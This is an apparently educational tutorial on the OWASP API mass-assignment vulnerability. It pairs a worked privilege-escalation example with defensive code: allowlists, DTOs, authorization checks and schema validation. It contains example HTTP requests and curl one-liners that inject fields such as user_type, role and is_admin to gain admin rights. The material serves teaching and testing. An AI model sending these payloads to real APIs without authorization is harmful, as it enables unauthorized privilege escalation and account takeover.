πŸ” OWASP API Security Top 10

API6:2023 - Mass Assignment Vulnerability

📋 Overview

Mass Assignment is a critical security vulnerability that occurs when an application automatically binds client-provided data to internal object properties without proper filtering. This vulnerability allows attackers to modify object properties that should not be publicly accessible, potentially leading to privilege escalation and unauthorized access.

What is Mass Assignment?

Mass Assignment happens when developers create object instances and expose internal parameters that should remain private. For example, when creating a user object, developers might include sensitive fields like account_type, is_admin, or role. If these parameters are not properly protected, attackers can manipulate them through API requests.

🎯 Real-World Scenario

Consider a typical user registration or profile update system. Developers create a user object with various properties including publicly editable fields (name, email) and sensitive fields (user_type, permissions, account_status). If the API endpoint doesn't validate which fields can be modified, attackers can inject unauthorized parameters.

Attack Flow Diagram

Normal User Request → Add Hidden Parameter → Privilege Escalation → Admin Access Gained

🔬 Practical Exploitation Example

Step 1: Normal API Request

First, let's examine a legitimate user profile update request:

POST /api/user HTTP/1.1
Content-Type: application/json
Authorization: Bearer [your_token]
{
  "name": "John",
  "last_name": "Doe"
}

This request updates the user's name fields, which is expected behavior.

Step 2: Analyzing the Response

After sending the legitimate request, examine the API response:

{
  "status": "success",
  "data": {
    "name": "John",
    "last_name": "Doe",
    "user_type": "user",
    "account_id": 12345
  }
}
⚠️ Security Issue Detected: The response echoes the user_type parameter, which is an internal role classification. Echoing it tells the client the exact field name the server binds, and that field should never be modifiable by ordinary users.

Step 3: Exploiting Mass Assignment

Now, attempt to modify the hidden parameter by including it in your request:

POST /api/user HTTP/1.1
Content-Type: application/json
Authorization: Bearer [your_token]
{
  "name": "John",
  "last_name": "Doe",
  "user_type": "admin"
}

🚨 Attack Vector Explanation

By copying the user_type parameter from the response and changing its value from "user" to "admin", the attacker attempts to elevate their privileges. If the API doesn't validate incoming parameters, this modification will be accepted, granting unauthorized administrative access.

Step 4: Verification

After sending the malicious request, check the response:

{
  "status": "success",
  "data": {
    "name": "John",
    "last_name": "Doe",
    "user_type": "admin",
    "account_id": 12345
  }
}
🔓 Vulnerability Confirmed: The user_type has been successfully changed to "admin". This indicates a successful privilege escalation attack through mass assignment.

πŸ›‘οΈ Defense Mechanisms

1. Whitelist Allowed Parameters

Only accept and process explicitly defined parameters that users should be able to modify.

// Example in Node.js/Express: copy only allowlisted fields out of the request body
const allowedFields = ['name', 'last_name', 'email'];
const updateData = {};

allowedFields.forEach(field => {
  if (req.body[field] !== undefined) {
    updateData[field] = req.body[field];
  }
});
// updateData now holds at most name, last_name and email; any other
// client-supplied field (such as user_type) is dropped before persistence.

2. Use Data Transfer Objects (DTOs)

Create specific objects that define exactly what data can be transferred between client and server.

// Example DTO in TypeScript
class UpdateUserDTO {
  name: string;
  last_name: string;
  email: string;
  // user_type is NOT included, so it can never be populated from a request

  // Copy fields one by one; never spread the raw request body into the DTO
  constructor(body: { name: string; last_name: string; email: string }) {
    this.name = body.name;
    this.last_name = body.last_name;
    this.email = body.email;
  }
}

3. Implement Property-Level Authorization

Verify that the current user has permission to modify each specific property.

// Check permissions before updating: only an administrator may set user_type.
// (user is the authenticated caller; isAdmin() and UnauthorizedError are the
// application's own helpers and are assumed to exist.)
// Compare against undefined rather than relying on truthiness, so an empty
// string or false is still treated as an attempt to set the field.
if (req.body.user_type !== undefined && !user.isAdmin()) {
  throw new UnauthorizedError('Cannot modify user_type');
}

4. Use Schema Validation

Implement strict schema validation to reject requests with unexpected fields.

// Example using the Joi validation library
const Joi = require('joi');
const schema = Joi.object({
  name: Joi.string().required(),
  last_name: Joi.string().required(),
  email: Joi.string().email()
}).unknown(false); // Reject unknown fields such as user_type

// validate() reports an error for any field outside the schema
const { error, value } = schema.validate(req.body);
if (error) return res.status(400).json({ status: 'error', message: error.message });

πŸ” Testing Methodology

How to Test for Mass Assignment Vulnerabilities

  1. Intercept API Requests: Use tools like Burp Suite or OWASP ZAP to capture API traffic
  2. Analyze Responses: Look for parameters in responses that aren't in your requests
  3. Test Parameter Injection: Add discovered parameters to your requests with modified values
  4. Check Common Vulnerable Fields: Test fields like role, admin, user_type, is_admin, permissions, status, etc.
  5. Verify Changes: Confirm if unauthorized modifications were accepted

Common Testing Commands

curl -X POST https://api.example.com/user -H "Content-Type: application/json" -d '{"name":"John","user_type":"admin"}'
curl -X PUT https://api.example.com/profile -H "Authorization: Bearer TOKEN" -d '{"email":"[email protected]","role":"administrator"}'
curl -X PATCH https://api.example.com/account -H "Content-Type: application/json" -d '{"username":"hacker","is_admin":true}'

📊 Vulnerability Impact Assessment

Impact Category          Severity   Description
Privilege Escalation     CRITICAL   Attackers can elevate their permissions to admin or superuser levels
Data Manipulation        HIGH       Unauthorized modification of sensitive database records
Account Takeover         CRITICAL   Ability to modify account ownership or authentication parameters
Business Logic Bypass    HIGH       Circumventing payment systems, approval workflows, or verification processes
Compliance Violations    MEDIUM     Breach of GDPR, PCI-DSS, or other regulatory requirements

💡 Key Takeaways

  • Mass Assignment occurs when APIs automatically bind user input to object properties without validation
  • Even if parameters are not visible in the UI, they can be discovered through API responses
  • Always use whitelisting instead of blacklisting for parameter validation
  • Implement proper authorization checks for all modifiable properties
  • Use DTOs and schema validation to enforce strict data contracts
  • Never trust client-side data; always validate on the server
  • Regularly audit your API endpoints for exposed sensitive parameters

🔗 Additional Resources

  • OWASP API Security Project: https://owasp.org/www-project-api-security/
  • OWASP API Security Top 10 2023
  • CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes
  • Testing tools: Burp Suite, OWASP ZAP, Postman, curl